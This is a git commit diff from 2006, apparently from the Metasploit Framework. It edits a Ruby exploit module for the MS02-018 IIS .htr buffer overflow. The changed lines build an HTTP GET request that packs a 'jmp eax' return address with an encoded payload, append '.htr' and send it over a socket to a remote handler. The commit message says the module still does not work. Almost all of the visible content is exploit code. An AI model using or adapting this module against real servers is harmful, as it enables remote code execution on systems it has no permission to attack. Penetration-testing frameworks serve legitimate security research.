* a few updates to make it a bit more like reality, still doesn't work though

git-svn-id: file:///home/svn/incoming/trunk@3518 4d416f70-5f16-0410-b530-b9f4589650da
unstable
bmc 2006-02-07 15:23:54 +00:00
parent 1351ceed1c
commit b99a9e5075
1 changed files with 3 additions and 3 deletions

View File

@ -63,9 +63,9 @@ class Exploits::Windows::Iis::MS02_018_HTR < Msf::Exploit::Remote
buf << [ target['Rets'][1] ].pack('V')
buf << payload.encoded
req = "GET /#{buf} HTTP/1.0\r\n\r\n"
print_status(sprintf("Trying target #{target.name} with jmp eax at 0x%.8x...", target['Rets'][1]))
sock.put(ret)
req = "GET /#{buf}.htr HTTP/1.0\r\n\r\n"
print_status("Trying target #{target.name} with jmp eax at 0x%.8x..." % target['Rets'][1])
sock.put(req)
handler
disconnect
end